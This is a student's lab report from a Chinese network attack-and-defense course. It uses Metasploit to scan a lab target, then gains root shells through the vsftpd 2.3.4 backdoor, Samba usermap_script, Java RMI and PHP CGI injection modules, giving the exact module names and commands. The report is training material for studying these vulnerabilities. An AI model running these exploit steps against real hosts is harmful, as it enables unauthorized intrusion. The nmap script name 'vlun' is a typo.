20222413 2024-2025-1 《网络与系统攻防技术》实验六实验报告
1.实验内容
1.1本周学习内容
在本周的学习过程中,我学习了如何使用Metasploit工具针对不同漏洞进行攻击,包括IE浏览器的ms10-002极光漏洞、Windows的SMB服务的MS08_067漏洞等。
1.2实验内容
掌握metasploit的用法:
(1)前期渗透
①主机发现
②端口扫描:可以直接用nmap,也可以用Aux中的portscan/tcp等。
③选做:也可以扫系统版本、漏洞等。
(2)Vsftpd源码包后门漏洞(21端口)
漏洞原理:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“: )”为结尾,服务器就会在6200端口监听,并且能够执行任意代码。
(3)SambaMS-RPC Shell命令注入漏洞(端口139)
漏洞原理:Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。
(4)Java RMI SERVER命令执行漏洞(1099端口)
漏洞原理:Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行。
(5)PHP CGI参数执行注入漏洞(80端口)
漏洞原理:CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。
2.实验过程
攻击机kali的ip地址:192.168.117.129
靶机ip地址:192.168.117.148
2.1前期渗透
2.1.1主机发现
①输入search arp_sweep
寻找Aux中的arp_sweep模块
②输入use 0
使用该模块
③输入show options
检查设置
④输入set RHOST 192.168.117.0/24
设置主机发现的网段
⑤输入run
运行,得到主机发现的结果,发现靶机ip地址192.168.117.148
2.1.2端口扫描
①输入search portscan
寻找Aux中的portscan/tcp模块
②输入use 5
使用该模块
③输入show options
检查设置
④输入set RHOST 192.168.117.148
设置目标ip地址
⑤输入run
运行
⑥所得端口扫描结果如下
2.1.3选做
①系统扫描,在终端界面输入nmap -O 192.168.117.148
扫描靶机系统
②漏洞扫描,在终端界面输入nmap --script=vlun 192.168.117.148
扫描靶机漏洞
2.2Vsftpd源码包后门漏洞
①输入use exploit/unix/ftp/vsftpd_234_backdoor
使用笑脸漏洞的模块
②输入show options
检查设置
③输入set RHOST 192.168.117.148
设置目标ip地址
④输入run
运行
⑤成功入侵目标主机,输入pwd``id``uname -a
命令验证成功获取主机shell
2.3SambaMS-RPC Shell命令注入漏洞
①输入use exploit/multi/samba/usermap_script
选择漏洞
②set RHOST 192.168.117.148
设置要攻击的机器IP
③exploit
开始攻击
④利用成功 执行uname–a
验证,成功获取靶机shell
2.4Java RMI SERVER命令执行漏洞
①检查1099端口是否打开,在之前的端口扫描中可以找到1099端口处于开放状态
②use exploit/multi/misc/java_rmi_server
③show options
查看配置参数
④set RHOST 192.168.117.148
⑤exploit/run
⑥sessions -i id
,此处id为1,会话正在进行
⑦shell
进入meterpreter时,使用whoami验证,结果返回root,成功获取主机shell
2.5PHP CGI参数执行注入漏洞
①use exploit/multi/http/php_cgi_arg_injection
选择漏洞
②set RHOST 192.168.117.148
设置要攻击的机器IP
③exploit/run
开始攻击
④输入shell、uname -a、pwd进行验证,成功获取主机shell
3.问题及解决方案
无
4.学习感悟、思考等
基于在课堂测试中所学的经验知识,我能够轻松地完成本次实验任务,在完成过程中没有遇到问题。通过这次实验我了解了更多系统漏洞的攻击方法,对于Metasploit的使用更加熟练,提高了我在实际渗透中的应用能力。
参考资料
- 渗透测试-nmap常用的漏扫命令https://blog.csdn.net/lza20001103/article/details/140351330